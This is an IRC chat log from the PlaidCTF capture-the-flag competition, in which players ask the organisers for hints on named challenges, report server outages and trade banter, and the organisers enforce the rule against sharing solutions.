(07:17:53) (+frozencemetery) n00bz: still me; feel free to pm
(07:18:06) (n00bz) lol
(07:19:46) jOin: (LMolr) (89ccb77e@gateway/web/freenode/ip.137.204.183.126)
(07:22:01) (c0ax) Who is familiar with kpop web200?
(07:22:04) qUit: (netsurf3) (
[email protected]) Remote host closed the connection
(07:22:08) (c0ax) I have few quest.
(07:23:38) (poppopret) anyone got a hint for doge_stege?
(07:23:47) (+frozencemetery) c0ax: pm
(07:23:57) (+frozencemetery) poppopret: http://play.plaidctf.com/problems/hints
(07:24:20) (poppopret) dont see anything there for doge_stege =/
(07:26:42) jOin: (positron_) (77f5f0c6@gateway/web/freenode/ip.119.245.240.198)
(07:27:03) qUit: ([GoN]starmie) (8ff8eb9c@gateway/web/freenode/ip.143.248.235.156) Quit: Page closed
(07:27:18) (positron_) do i have to bruteforce in mtpox?
(07:27:31) (c0ax) no
(07:28:45) (Ymgve) shouldn't it be "saas" not "sass"?
(07:28:58) (wtbw) less of that sass
(07:29:58) pArt: (javex) (javex@2a01:7e00::f03c:91ff:fe70:76f8)
(07:30:00) (+frozencemetery) before running any brute force, ask: will this finish: in a few minutes? Then it's probably okay. Not before the CTF ends? Then you might not wanna do it.
(07:30:52) (Ymgve) and then someone comes with a CTF task that requires you to brute force timestamps - from the future!
(07:30:57) (Ymgve) (not this CTF tho)
(07:31:23) (marcoscars02) any help with doge_stege?
(07:31:36) (marcoscars02) I'm goning crazy xD
(07:31:41) (LMolr) yeah ef-in doge and crypto 20 :/
(07:31:42) (poppopret) do we need to script anything for doge_stege?
(07:31:46) (+frozencemetery) if you've got a question, we can maybe answer it
(07:31:54) (+frozencemetery) poppopret: if and only if it would help
(07:32:12) (marcoscars02) I have a strings, but nothing is the flag
(07:32:23) (positron_) c0ax: so i need bypass strstr?
(07:32:40) (+frozencemetery) marcoscars02: have you considered getting better strings? :P
(07:32:49) (c0ax) positron_,
(07:33:20) (poppopret) better strings? wat.
(07:33:27) jOin: (cmplxen) (~cmplxen@unaffiliated/cmplxen)
(07:33:29) (marcoscars02) frozencemetery, I don't know haha I'm... desperate
(07:33:39) (c0ax) positron_, no
(07:33:48) (+frozencemetery) poppopret: you know, strings which as a set contain the key
(07:33:50) (+frozencemetery) better strings
(07:33:52) (+frozencemetery) more good
(07:34:31) (marcoscars02) tss
(07:34:39) (marcoscars02) hmm
(07:36:28) (positron_) c0ax: umm, i cant think of anything
(07:37:10) (niph) hey guys, someone got a hint for _nightmares_ ? Im able to read files and i guess the flag is stored somewhere in a file, but no idea on how to get the file name. Any suggestions?
(07:37:36) (+ricky) You should get a shell, it's not meant to be solved by just reading the flag file
(07:38:18) (niph) argh, thanks for the advice :D
(07:39:22) jOin: (vaivai) (558f7023@gateway/web/freenode/ip.85.143.112.35)
(07:40:36) (auscompgeek) how does one possibly get a shell from just stdout
(07:40:49) (cool_guy) this g++ is killing me
(07:41:36) (poppopret) are you supposed to trace for g++?
(07:41:56) qUit: (cmplxen) (~cmplxen@unaffiliated/cmplxen) Quit: leaving
(07:42:10) (s_kunk) you can generate an instantiation diagram
(07:42:46) (rokko) who solved whatscat, got a non-hint question about it?
(07:44:12) (+pctf_scoreboard) rokko: discussion of solution paths is not permitted, especially when you have not solved the problem
(07:45:21) (rokko) if admin can't help, maybe someone else can...
(07:45:47) (+pctf_scoreboard) please read the ctf rules, especially #3.
(07:46:59) (rokko) why are you supposing that i'm sharing solutions or keys?...
(07:47:13) mOde: (ChanServ) sets (+v frozencemetery)
(07:47:41) (+frozencemetery) rokko: because I'm the one standing at the scoreboard.
(07:48:29) (rokko) frozencemetery: yup, while talking to you i tel more details than i will tell other ppl, it's obviouse
(07:48:38) qUit: (guy_) (~guy@unaffiliated/guy/x-2189580) Ping timeout: 255 seconds
(07:48:59) (+frozencemetery) there is nothing you could possibly ask them that you could not ask in pulbic that would not fall under rule 3.
(07:50:27) qUit: (chrissing) (
[email protected]) Remote host closed the connection
(07:51:51) jOin: (thedoctordmc) (4ba3c7ba@gateway/web/freenode/ip.75.163.199.186)
(07:52:37) (thedoctordmc) Is play.plaidctf.com down again?
(07:52:43) qUit: (niph) (
[email protected]) Quit: Textual IRC Client: www.textualapp.com
(07:53:17) (+frozencemetery) thedoctordmc: it's maybe a little slow as people wake up, but it looks okay from here?
(07:53:57) (thedoctordmc) @frozencemetery: got it back now, thanks.
(07:54:34) (rokko) anyway, it was said, that ppp cannot create good webs, this ctf proves it's true; 'cos web should only require browser to solve it; whatcats requires more...; bye, waste of time on this ctf
(07:54:38) qUit: (rokko) (5775c785@gateway/web/freenode/ip.87.117.199.133) Quit: Page closed
(07:54:51) (sven) lol
(07:55:06) (+frozencemetery) tylerni7: ^
(07:55:29) (sven) "This CTF is too hard for me! How am I supposed to win when there's other people who are better than me who can solve those challenges?! Screw you, I'm going home!"
(07:55:36) jOin: (abc123) (6e9f6937@gateway/web/freenode/ip.110.159.105.55)
(07:55:50) (Pitr_) such frustration
(07:56:00) nIck: (abc123) is now known as (Guest22470)
(07:56:25) (sven) less x86, moar parlor and rsa and stuff like that plz :)
(07:56:29) ([pwn]TM) i give it 2/5 on best ragequests ever
(07:56:40) (Guest22470) web 150
(07:56:42) (Pitr_) http://i293.photobucket.com/albums/mm62/Floodgates13/AGK.jpg
(07:56:44) ([pwn]TM) quit*
(07:57:33) (Pitr_) Although I'd appreciate it if there were more web challenge without login/encryption hacking
(07:57:58) (Pitr_) or alternatively only release them when I'm awake, american team members keep solving them :(
(07:58:11) (+frozencemetery) man, I heard somewhere that Angry German Kid was fake, and then I had to re-evaluate, like, my whole existence
(07:58:54) jOin: (Beched) (6dbc7f66@gateway/web/freenode/ip.109.188.127.102)
(07:59:16) nIck: (Mawekl) is now known as (Mawekl|DrgnS)
(07:59:43) (+frozencemetery) speaking of re-evaluating one's own existence, I'm the only person awake right now :|
(08:00:05) ([pwn]TM) frozencemetery: dont worry, we are not bots!
(08:00:23) (+frozencemetery) [pwn]TM: that sounds just like something a bot would say!
(08:00:24) (+frozencemetery) haha
(08:00:53) ([pwn]TM) well, then it is your task to make sure we are people isnt it?
(08:00:58) (sven) i'm an angry german kid
(08:01:15) (nopple) where's geobot when you need it
(08:01:16) (+frozencemetery) [pwn]TM: okay, to prove you're human, solve this ctf :)
(08:02:05) (+frozencemetery) hmm, he's not even in #pwning right now
(08:02:31) (Pitr_) frozencemetery: what team are you in?
(08:02:42) (poppopret) isn't he admin?
(08:02:48) (+frozencemetery) Pitr_: the voiced people (the plus in front of our name) are all PPP
(08:02:57) (poppopret) ^
(08:03:08) ([pwn]TM) frozencemetery: you dont tell me what my goals are! i have free will!
(08:03:15) (Pitr_) oh sorry, didnt bother to look at the user list :-P
(08:03:17) qUit: (l0l0l) (932e7f69@gateway/web/freenode/ip.147.46.127.105) Quit: Page closed
(08:03:23) jOin: (haoz) (6e9f6937@gateway/web/freenode/ip.110.159.105.55)
(08:03:31) (+frozencemetery) Pitr_: no worries :)
(08:03:34) (Pitr_) [pwn]TM: and thus began the Butlerian Jihad
(08:03:35) qUit: (Guest22470) (6e9f6937@gateway/web/freenode/ip.110.159.105.55) Ping timeout: 240 seconds
(08:03:45) (+frozencemetery) [pwn]TM: is this a situation where you're gonna solve the ctf, but not because I told you to? :P
(08:03:47) (mathiasbynens) rendezvous down?
(08:03:56) (+frozencemetery) mathiasbynens: one second, let me check
(08:04:12) mathiasbynens already tried several Tor identities
(08:06:39) jOin: (cmplxen) (~cmplxen@unaffiliated/cmplxen)
(08:07:31) (hbw) anyone I can ask about kappa before I go on a wild goose chase?
(08:07:42) jOin: (connection) (~connectio@hacktalk/staff/connection)
(08:07:49) (+frozencemetery) mathiasbynens: so this'll take a minute, but it's likely that it's still working as intended
(08:07:53) (+frozencemetery) hbw: sure, hit me
(08:09:17) (+frozencemetery) mathiasbynens: yeah it's working
(08:09:28) (danitorwS) could you check wheeee server is answering to encryption strings, please?
(08:09:46) (+frozencemetery) danitorwS: sure, one second
(08:10:51) (positron_) what should i do after login admin page in mtpox?
(08:11:21) (+frozencemetery) getting the flag is usually a good route to pursue :)
(08:11:46) (+frozencemetery) if you've got questions about the problem, feel free to pm me
(08:12:06) qUit: (poppopret) (
[email protected]) Remote host closed the connection
(08:13:34) qUit: (haoz) (6e9f6937@gateway/web/freenode/ip.110.159.105.55) Quit: Page closed
(08:15:58) jOin: (Zoro) (328200f8@gateway/web/freenode/ip.50.130.0.248)
(08:16:27) jOin: (haoz) (6e9f6937@gateway/web/freenode/ip.110.159.105.55)
(08:18:46) qUit: (gameredan) (~gameredan@unaffiliated/gameredan) Read error: Connection reset by peer
(08:19:54) nIck: (gameredan) is now known as (Guest17539)
(08:20:07) (zTrix_) parlor server seems down?
(08:21:12) (zTrix_) and admin here? parlor (crypto 250) 54.197.195.247:4321 seems down
(08:21:28) (+frozencemetery) hmm, yes
(08:21:32) (+frozencemetery) I cna confirm that
(08:21:34) (+frozencemetery) looking into it
(08:22:10) jOin: (paul55) (b4f91af3@gateway/web/freenode/ip.180.249.26.243)
(08:22:35) qUit: (approximatehack) (7aa68c6a@gateway/web/freenode/ip.122.166.140.106) Ping timeout: 240 seconds
(08:23:35) qUit: (vaivai) (558f7023@gateway/web/freenode/ip.85.143.112.35) Ping timeout: 240 seconds
(08:24:17) (+frozencemetery) zTrix_: looks up now; try it again?
(08:24:24) jOin: (aaaaa) (4e087709@gateway/web/freenode/ip.78.8.119.9)
(08:25:08) pArt: (aaaaa) (4e087709@gateway/web/freenode/ip.78.8.119.9)
(08:25:15) jOin: ([SF]testdata) (75d9b8dc@gateway/web/freenode/ip.117.217.184.220)
(08:29:54) (positron_) the flag of mtpox in database?
(08:30:33) qUit: (cmplxen) (~cmplxen@unaffiliated/cmplxen) Quit: leaving
(08:33:08) (+frozencemetery) mtpox does indeed have a flag which is checked against our database, yes.
(08:33:22) (synick) lol
(08:33:45) (+frozencemetery) positron_: if you've got questions about mtpox or any other problem, feel free to pm me
(08:36:09) jOin: (oscalation) (~Home@unaffiliated/oscalation)
(08:36:33) (oscalation) can i ask for help on the first tile here? just a noob. MTPOX
(08:39:46) jOin: (pcc7_) (c0518434@gateway/web/freenode/ip.192.81.132.52)
(08:40:00) (stypr_irccloud) woke up. looking for ponies
(08:41:05) qUit: (pcc7) (c0518434@gateway/web/freenode/ip.192.81.132.52) Ping timeout: 240 seconds
(08:42:10) (+frozencemetery) oscalation: stypr_irccloud: pm me, but expect a delay; all the player just woke up it seems
(08:42:29) (stypr_irccloud) lol
(08:44:45) qUit: (T1mb0) (
[email protected]) Quit: HydraIRC -> http://www.hydrairc.com <- *I* use it, so it must be good!
(08:49:27) qUit: (Digihash) (
[email protected]) Remote host closed the connection
(08:49:52) (ius) stupid ponies
(08:49:52) (spq) damn, i hat harry potter now
(08:49:56) (ius) i used to be a brony
(08:49:59) (ius) NOT ANYMORE
(08:50:21) (ius) who can i bug about bronies?
(08:50:39) (+frozencemetery) me
(08:50:46) (+frozencemetery) I'm the only one awake, so you're stuck with me :)
(08:50:47) (fasmotol) whom to can i pm about hudak and ezhp?
(08:50:52) +frozencemetery up-enter
(08:51:38) (pez) lol
(09:00:35) qUit: (Zoro) (328200f8@gateway/web/freenode/ip.50.130.0.248) Ping timeout: 240 seconds
(09:04:16) jOin: (aaaaa) (4e087709@gateway/web/freenode/ip.78.8.119.9)
(09:04:31) pArt: (aaaaa) (4e087709@gateway/web/freenode/ip.78.8.119.9)
(09:04:47) jOin: (handlr) (~handlr@unaffiliated/handlr)
(09:07:43) (+frozencemetery) my apologies; anyone who pm'd me in the last 10 minutes and who has not yet received a reply should do so again
(09:07:47) (+frozencemetery) my laptop battery just died
(09:08:42) (Gynvael) frozencemetery: I was asking about pwn1000
(09:09:21) (+frozencemetery) yes please pm me again
(09:09:32) (+frozencemetery) :P
(09:14:04) (NK_) so ricky
(09:14:08) (NK_) you finally opened your task ?
(09:14:37) (+frozencemetery) (he's asleep)
(09:14:50) (+frozencemetery) but yes, his killer problem is in fact open
(09:16:14) (hellman_) gg dragon sector!
(09:17:54) (synthverity) So, who here has not slept for the entire thing?
(09:18:27) (tokki) how much more of ctf-ing?
(09:18:58) (Gynvael) 7 h
(09:19:06) (Gynvael) well, 6:40
(09:19:34) (+frozencemetery) nice job dragon sector
(09:19:53) (oscalation) anyone here planing on writing a blog post about the ctf for solutions after the contest ends?
(09:20:31) (foundation) oscalation: it's in the rules
(09:20:37) (+frozencemetery) ooh, discharge in 15 minutes. Sometimes it's nice to be behind :)
(09:20:39) (foundation) if you want $$$ , gota make writeups
(09:20:55) (oscalation) ah nice, where would i find the writeups?
(09:20:59) (foundation) frozencemetery: what are the options
(09:21:10) (foundation) oscalation: watch out for those at ctftime.org
(09:21:16) (|x_x|) oscalation: google, ctfitime, etc.
(09:21:35) (+frozencemetery) foundation: looks like... a reversing, a pwnable, or a forensics
(09:21:54) (wtbw) frozencemetery: what number for the reversing?
(09:21:57) (foundation) chanses are blocked?
(09:22:12) (+frozencemetery) foundation: well, you can always choose a chance unless the previous choice was a chance
(09:22:21) (foundation) ok
(09:24:34) qUit: (eastwolf_) (ad42d345@gateway/web/freenode/ip.173.66.211.69) Quit: Page closed
(09:25:36) qUit: (pcc7_) (c0518434@gateway/web/freenode/ip.192.81.132.52) Ping timeout: 240 seconds
(09:27:07) (LMolr) who can i ping for freya
(09:28:51) (+frozencemetery) me
(09:28:56) (tokki) lol
(09:29:01) (+frozencemetery) not only is it my problem, but I'm the only one awake right now :)
(09:29:54) jOin: (aaaaa) (4e087709@gateway/web/freenode/ip.78.8.119.9)
(09:30:21) pArt: (aaaaa) (4e087709@gateway/web/freenode/ip.78.8.119.9)
(09:30:33) (DonnchaC) Can I PM someone about kpop?
(09:31:34) (+frozencemetery) DonnchaC: hit me
(09:32:44) jOin: (ciliated) (99bd4541@gateway/web/freenode/ip.153.189.69.65)
(09:34:23) (ciliated) is kpop sqli?
(09:35:29) (+pctf_scoreboard) I guess I'd rather have network problems than infra problems, but MAN this is rediculous
(09:36:05) qUit: (bs`) (~bs@gateway/tor-sasl/bs/x-48276796) Remote host closed the connection
(09:36:41) jOin: (bs`) (~bs@gateway/tor-sasl/bs/x-48276796)
(09:36:47) (n00bz) you guys should have build a paged scoreboard
(09:37:10) (+pctf_scoreboard) but then we couldn't be obnoxiously web2.0!
(09:41:10) (+pctf_scoreboard) ooh, new problem
(09:41:27) (+pctf_scoreboard) y'all nerds chose forensics :P
(09:42:17) mOde: (ChanServ) sets (+v frozencemetery)
(09:42:21) jOin: (aaaaa) (4e087709@gateway/web/freenode/ip.78.8.119.9)
(09:42:22) qUit: (Knight1) (
[email protected]) Quit: Try HydraIRC -> http://www.hydrairc.com <-
(09:42:32) (+pctf_scoreboard) nopple: ^
(09:42:36) (LuckyY) srsly? 35,0KB/s
(09:42:37) (hellman_) what's right name for Pinkie Pie ?
(09:43:03) (+pctf_scoreboard) geobot: woo!
(09:44:20) (Ymgve) is the slow bbos speed part of the challenge? :)
(09:44:37) jOin: (zzoru) (8ff8f941@gateway/web/freenode/ip.143.248.249.65)
(09:44:48) (+frozencemetery) Ymgve: depends, will it make you happier if I say yes? :)
(09:45:03) pArt: (aaaaa) (4e087709@gateway/web/freenode/ip.78.8.119.9)
(09:45:08) (Ymgve) well, gained speed now at least
(09:45:32) (+frozencemetery) only because you threatened it :P
(09:46:43) (nopple) geobot: can you give me a hint on pwn1000?
(09:46:44) (geobot) query me see your appoach might work i stop giving a hint as keyworkds
(09:47:06) qUit: (oscalation) (~Home@unaffiliated/oscalation) Quit: Leaving.
(09:47:35) qUit: (bobsteam) (1817f0b6@gateway/web/freenode/ip.24.23.240.182) Ping timeout: 240 seconds
(09:47:50) (ciliated) i think kpop is much difficult than whatscat :(
(09:49:29) (Xteven) is web800 down?
(09:50:10) (+frozencemetery) Xteven: no, just slow
(09:50:46) (Xteven) ok
(09:52:21) (NK_) cai_: "Last submission 2 days ago
(09:52:26) (NK_) it's getting worse ! :)
(09:54:57) (haoz) web 150 .. anyone ?
(09:54:58) (geobot) those 150 people in #pwning -> https://twitter
(09:55:28) (+frozencemetery) haoz: hit me
(09:57:53) (n00bz) 6 hrs left?
(09:58:01) (+frozencemetery) indeed!
(09:58:29) (+frozencemetery) \insanitywolf{6 hours left in pctf}{better go sleep}
(09:58:56) (ryan-c) I *just* noticed the jumanji background image
(09:59:18) (stypr_irccloud) web800 is so difficult
(10:00:19) (ryan-c) it's 800 points total
(10:01:56) (+frozencemetery) it is the biggest egg
(10:01:59) (+frozencemetery) so big
(10:02:06) (mak`) can i talk to someone about zfs?
(10:02:40) (ryan-c) frozencemetery: you clearly use latex too much
(10:02:46) (+frozencemetery) mak`: hit me
(10:02:59) (+frozencemetery) ryan-c: yeah I've written more latex than code at this point. It's not great
(10:03:37) ryan-c eyes parlor
(10:03:51) (n00bz) ryan-c, hf=
(10:03:53) (n00bz) ?
(10:03:54) (bool101) how many times has bronies 1 been solved?
(10:04:16) (+frozencemetery) bool101: you can see that by clicking its square on the gameboard
(10:05:09) (ryan-c) it doesn't actually show that
(10:05:12) (bool101) I see the top three solves there but where is the total?
(10:06:39) jOin: (javex) (javex@2a01:7e00::f03c:91ff:fe70:76f8)
(10:07:42) (factoreal) help for forensic_450
(10:08:01) (factoreal) who working on forensic_450(RSA)?
(10:08:18) (nopple) geobot: halp!
(10:08:44) (nopple) geobot: i am disappoint
(10:09:09) (whois) tooooooo slow bbos
(10:10:15) (+tylerni7) sorry everyone
(10:10:17) (+tylerni7) I just woke up
(10:10:27) (+tylerni7) feel free to pm me now
(10:10:55) (ryan-c) factoreal: try inverting the algebraic splines
(10:11:25) (+tylerni7) [GoN]Jakkdu: ping
(10:11:34) (+tylerni7) pm me if you're around
(10:12:00) (+frozencemetery) ryan-c: yes it does; it's in the corner
(10:12:35) (ryan-c) frozencemetery: of the square? that shows zero
(10:12:55) (+frozencemetery) uh
(10:12:57) (+frozencemetery) no it doesn't
(10:12:59) (+frozencemetery) bottom left; 4
(10:13:07) jOin: (wheee) (75600123@gateway/web/freenode/ip.117.96.1.35)
(10:13:09) ryan-c mashed f5
(10:13:28) (ciliated) i have question about parlor, does "md5(our number + your number)" means "md5(concat(str(our number), str(your number)))"?
(10:13:32) (wheee) uh are there any hints for tenement
(10:13:41) (+tylerni7) ciliated: what's up
(10:13:48) (+tylerni7) you can check it by hand?
(10:13:49) (ryan-c) frozencemetery: bottom left is showing zero for me
(10:13:55) (+tylerni7) I mean.. it'll give you the server nonce
(10:14:06) (+frozencemetery) ryan-c: you should probably refresh the gameboard
(10:14:07) tokki is drooling over keyboard
(10:14:24) (+frozencemetery) ciliated: you may have to provide an additional newline beyond what you expect
(10:14:51) (HENLEYbls) grrr the multiplication one is bugging me lol
(10:15:07) (ryan-c) frozencemetery: i just did refresh it
(10:15:39) (+frozencemetery) sorry, wrong problem. It is zero.
(10:15:48) (alexwebr) o/
(10:15:49) (stypr) oh god
(10:15:53) (stypr) I am exhausted
(10:15:55) (|x_x|) rofl
(10:15:56) (|x_x|) oh god.
(10:15:59) (stypr) after that internet bill problem
(10:16:05) (|x_x|) I finally got Multiplication is Hard.
(10:16:08) (|x_x|) That's hillarious.
(10:16:16) (stypr) yeah. it was something random
(10:16:23) (stypr) maybe it's too obvious
(10:16:29) (|x_x|) Not random, but it was rather brilliant in a way.
(10:16:30) (stypr) Hertz__
(10:16:32) (stypr) sup
(10:16:35) (ciliated) +tylerni7: so md5(concat(hex(our number), hex(your number))) is right?
(10:16:42) (ryan-c) frozencemetery: yeah, the newline got me
(10:16:45) (ryan-c) ciliated: no
(10:16:54) (+tylerni7) ciliated: try a few things and see?
(10:17:07) (ryan-c) ciliated: if it works your answer will match up
(10:17:08) (iZsh) wtf
(10:17:13) (iZsh) are you really talking in public?
(10:17:40) (+tylerni7) iZsh: it says in the problem that it's md5(our number + your number)
(10:17:43) (ciliated) ok, its my misunderstanding
(10:17:51) (+tylerni7) so it's not giving any new info
(10:17:59) (ryan-c) <frozencemetery> ciliated: you may have to provide an additional newline beyond what you expect
(10:19:05) (ryan-c) also, if the vuln in parlor is what i think it is, it's pretty epic
(10:19:18) (_blasty_) LOL MONEY, MONEY LOL
(10:19:37) (ryan-c) tylerni7: was it another of your masterpieces?
(10:20:07) (+tylerni7) yeah parlor is mine as well
(10:20:09) (+mserrano) lol
(10:20:15) +ricky wakes up
(10:20:30) (+tylerni7) imma fix it so when you connect it'll tell you it includes the newline
(10:20:32) jOin: (l0l0l) (dd94627a@gateway/web/freenode/ip.221.148.98.122)
(10:20:44) (+ricky) _blasty_: solve bronies yet? :-) Don't ignore it just because it's web
(10:21:00) (+tylerni7) ooo 0xffa back in first
(10:21:04) (+ricky) Wow, tight game
(10:21:07) (+tylerni7) this is getting interesting now :O
(10:21:13) (+ricky) Congrats 0xffa
(10:21:15) (_blasty_) LOL MONEY MONEY LOL
(10:21:44) (+dickoff) _blasty_: I love that youtube video
(10:21:46) qUit: (shhdup) (
[email protected]) Read error: Connection reset by peer
(10:21:51) (_blasty_) dickoff: :D
(10:22:28) (+tylerni7) parlor text updated when you connect :)
(10:22:37) (+tylerni7) sorry for that :(
(10:22:50) (ryan-c) tylerni7: It wasn't *too* hard to figure out.
(10:23:28) (positron_) plz hints for kpop
(10:23:43) (+tylerni7) ryan-c: yeah, it was unintended though :(
(10:24:25) qUit: (ccmndhd) (
[email protected]) Quit: This computer has gone to sleep
(10:25:10) (ryan-c) tylerni7: Yeah, I was guessing it was. I found it and mentioned it to whoever was awake last night.
(10:25:28) jOin: (halfvollemelk) (589f763c@gateway/web/freenode/ip.88.159.118.60)
(10:25:31) (+mserrano) hi ricky
(10:25:37) (+tylerni7) yeah, they didn't want to touch the server because it broke a very fragile checker script
(10:25:42) (positron_) kpop uses file write?
(10:25:48) (+tylerni7) (we have solutions we periodically throw at problems to make sure they are working)
(10:25:53) (+tylerni7) anyway
(10:25:59) (+tylerni7) hopefully it's more clear when you connect now
(10:25:59) (ryan-c) I'm trying to decide how much to bother automating a solution
(10:26:12) (+mserrano) positron: you have no write permissions anywhere interesting
(10:26:20) (iZsh) anyone about bbox?
(10:26:44) (+tylerni7) iZsh: hmm.. I know a tiny bit about it
(10:26:57) (+tylerni7) you can pm me for now... clockish or awesie know more
(10:27:05) (+tylerni7) one of them will be around in a little bit
(10:27:48) (positron_) +mserrano: i see
(10:28:51) jOin: (sigsegv_) (7ab35ee7@gateway/web/freenode/ip.122.179.94.231)
(10:29:46) jOin: (himanshu_) (1b22f3ba@gateway/web/freenode/ip.27.34.243.186)
(10:32:14) jOin: (slimmer) (1f1821dd@gateway/web/freenode/ip.31.24.33.221)
(10:36:15) pArt: (javex) (javex@2a01:7e00::f03c:91ff:fe70:76f8)
(10:37:55) qUit: (wheee) (75600123@gateway/web/freenode/ip.117.96.1.35) Quit: Page closed
(10:38:47) (factoreal) who working on web_200 reekee?
(10:38:48) (geobot) we won't be working hard to deny we have nfc phones
(10:39:10) (_blasty_) w3 g0t th3 pr0duktttt
(10:39:45) (ryan-c) _blasty_: https://www.youtube.com/watch?v=LkEsP9H2HGM
(10:40:01) (ryan-c) https://www.youtube.com/watch?v=1dcrV_7JpXQ actually
(10:40:18) jOin: (rickroll_) (4ac33e6f@gateway/web/freenode/ip.74.195.62.111)
(10:40:33) (_blasty_) ryan-c: I like the popular demo :-) and poem to a horse of course :-)
(10:41:12) (rickroll_) hi, anybody willing to help with last part of ezhp? stuck hard, and I just want to confirm I'm not way off course.
(10:41:12) (geobot) hi, we're legitimate business syndicate
(10:42:18) (+frozencemetery) geobot++
(10:43:25) (ryan-c) geobot: orly
(10:43:58) (+ricky) Woo, 0xffa solidifies their first place with bronies 1
(10:44:06) (+ricky) Still wonder if anybody's planning on getting part 2 :-)
(10:44:56) (ryan-c) ricky: not worth dropping my 0days on it :/
(10:45:31) +ricky wonders if tomcr00se is going for bronies 2
(10:45:35) (+ricky) ryan-c: No 0days required
(10:45:52) (+mserrano) :)
(10:46:26) (ryan-c) ricky: yeah, but figuring out how to do it the right way is too much work
(10:46:46) (+mserrano) it's not *that* bad
(10:46:50) (+mserrano) it's actually an amazing problem
(10:46:53) (+mserrano) I give it 10/10
(10:46:54) (Ymgve) wtf bbos
(10:46:57) (ryan-c) hopefully there will be writeups
(10:47:05) (+mserrano) not unless someone solves it!
(10:47:14) (+ricky) I'm expecting writeups on part 1, less sure about part 2
(10:47:35) (+cai_) teams will need to submit their writeups in order to claim prize
(10:47:38) (ryan-c) well, i'm working on parlor, because i know i can get it
(10:47:49) (+ricky) Would be nice if somebody got part 2 - we decided to be kind of nice on part 2 since there wasn't that much time left
(10:47:59) (+ricky) Well kind of
(10:48:58) (ryan-c) i'm curious how many people solved rsa the intended way
(10:50:05) qUit: (Beched) (6dbc7f66@gateway/web/freenode/ip.109.188.127.102) Ping timeout: 240 seconds
(10:50:31) (iZsh) ricky: just be careful not to give hints while wanting to have ppl solve it pls ):
(10:50:33) (iZsh) :)
(10:50:40) (+mserrano) :P
(10:50:47) (+ricky) No hints, just ample encouragement
(10:50:56) (iZsh) easy to get SE'ing ;-)
(10:51:01) (+tylerni7) hint: get teh flage
(10:51:10) (+mserrano) hint: teh flage is not poop
(10:51:15) (ryan-c) Teh flage u say?
(10:51:16) (geobot) did tyler say?
(10:51:16) (+tylerni7) mserrano: it might be
(10:51:20) (ryan-c) I have to... get it?
(10:51:26) (+mserrano) yes
(10:51:30) (ryan-c) I see. Thank you!
(10:51:31) (+frozencemetery) geobot: u wot m8
(10:51:33) (+tylerni7) mserrano: stop giving away hints
(10:51:33) (geobot) giving your mail clients, we don't you like playfair ciphers
(10:51:46) (sven) can i pm someone about freya?
(10:52:12) (+tylerni7) sven: frozencemetery
(10:52:22) (+frozencemetery) sven: hit me
(10:52:31) (AnthraX101) Can I pm someone about this rash?
(10:52:39) (+tylerni7) AnthraX101: the_doctor
(10:52:39) (+mserrano) AnthraX101: yes, a doctor
(10:52:43) (+mserrano) efb
(10:52:46) (AnthraX101) hivemind.
(10:52:54) (+tylerni7) AnthraX101: or ricky
(10:52:55) (+frozencemetery) M-x doctor
(10:52:56) jOin: (Frisk0) (~Frisk0@2601:7:9e00:8f:249e:c110:e2b2:2c60)
(10:53:09) (+ricky) I think tylerni7's closer to being a Dr than me
(10:53:10) (+mserrano) Make sure to ask ricky how you can repay him in cheese
(10:53:17) (+tylerni7) ricky: not sure about that
(10:53:41) nIck: (daniel) is now known as (Guest71506)
(10:54:05) (Guest71506) hi, anyone I could talk to regarding the tor chal?
(10:54:19) (+tylerni7) Guest71506: you can talk to me tiny bit
(10:54:26) (+tylerni7) houqp knows more, but I think he's asleep
(10:55:18) jOin: (slimmer_) (1f1821dd@gateway/web/freenode/ip.31.24.33.221)
(10:56:35) qUit: (slimmer) (1f1821dd@gateway/web/freenode/ip.31.24.33.221) Ping timeout: 240 seconds
(10:56:51) qUit: (LMolr) (89ccb77e@gateway/web/freenode/ip.137.204.183.126) Quit: Page closed
(10:57:15) (DonnchaC) Which challange is the Tor challange?
(10:57:55) (|x_x|) Rendevouz
(10:57:57) (+mserrano) DonnchaC: rendezvous
(10:59:51) (ryan-c) you guys should bump that up 100 points :p
(11:00:09) (+mserrano) meh
(11:00:43) (+mserrano) in hindsight many of our point values were a bit off
(11:00:46) qUit: (gbarboza) (~gbarboza@unaffiliated/sonicvanajr) Quit: mIRC v1.47
(11:00:49) (+frozencemetery) people have solved it; not fair to bump it now
(11:00:59) jOin: (gbarboza) (~gbarboza@unaffiliated/sonicvanajr)
(11:00:59) mOde: (ChanServ) sets (+v gbarboza)
(11:01:40) (asmoday) cattle moooo
(11:01:47) qUit: (slimmer_) (1f1821dd@gateway/web/freenode/ip.31.24.33.221) Quit: Page closed
(11:02:43) (ryan-c) mserrano: I actually liked the analysis you guys did a few years back that re-computed the rankings based on weighing the values of challanges by number of solves
(11:02:54) (tokki) ooh
(11:03:15) ryan-c stares at parlor
(11:03:18) (+mserrano) we may look at doing an analysis again
(11:03:49) (ryan-c) i know how to solve it, but my motivation is still in bed
(11:03:52) (ryan-c) :|
(11:04:29) (tokki) bronies, brownies
(11:04:30) (ryan-c) also i think i smell bad from hacking too much and showering too little
(11:04:38) (tokki) lol
(11:04:44) (ryan-c) anyone else feel like that?
(11:05:05) asmoday waves hand
(11:05:51) (asmoday) I have forgone the Defcon rules as I am home
(11:05:57) (n00bz) anyone on web-js?
(11:05:58) (geobot) is anyone working on zen garden xd
(11:06:05) (DonnchaC) mserrano: Thanks
(11:06:06) (ryan-c) defcon has a shower rule?
(11:06:07) (+tylerni7) geobot: don't think so
(11:06:07) (geobot) quick, think 3
(11:06:11) (ryan-c) i never noticed that
(11:06:11) (+frozencemetery) i,i xen garden
(11:06:14) (+mserrano) geobot: that ctf was ages ago man
(11:06:14) (geobot) this channel that does not to sensationalize shit has to run that might be ubuntu/debian with last year it was better than the doses were fixed a few days ago or so?
(11:06:29) (+tylerni7) doses? you mean heartbleed? that wasn't a dos
(11:06:30) (chrissing) any hint for zfs?
(11:06:39) (+frozencemetery) geobot: wait, they fixed the doeses on freenode?
(11:06:43) (Hertz__) n00bz: me
(11:06:46) (+mserrano) zfs is a quality filesystem.
(11:06:56) (+mserrano) it is a helper
(11:06:59) (chrissing) lol i kne that
(11:07:01) (+frozencemetery) mserrano: it's quality!
(11:07:05) (asmoday) cuts like a knife
(11:07:07) (Xteven) any clues for web800?
(11:07:13) (ryan-c) ppp d00ds, do you guys do all your challange playtesting in-house?
(11:07:14) (+mserrano) Xteven: webbbbbbbbbbbbbbbbbbbbb
(11:07:18) (+mserrano) ryan-c: yes
(11:07:19) (+frozencemetery) Xteven: shits hard yo
(11:07:25) (ryan-c) i guess it's not hard given your size :P
